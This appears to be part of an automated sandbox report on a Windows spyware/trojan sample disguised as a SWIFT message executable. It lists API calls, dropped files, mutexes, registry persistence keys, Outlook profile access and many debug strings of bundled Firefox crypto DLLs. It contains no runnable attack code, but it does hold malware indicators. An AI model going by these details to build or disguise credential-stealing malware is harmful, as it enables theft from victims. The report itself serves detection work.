Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\nsrF4CB.tmp
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004020FE CoCreateInstance, 1_2_004020FE
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_004046E6
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-B8590654-32BFA095
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen
Source: Swift Mesaj#U0131#09971.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7974385257.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988457162.000000001DD24000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971102874.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971021047.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
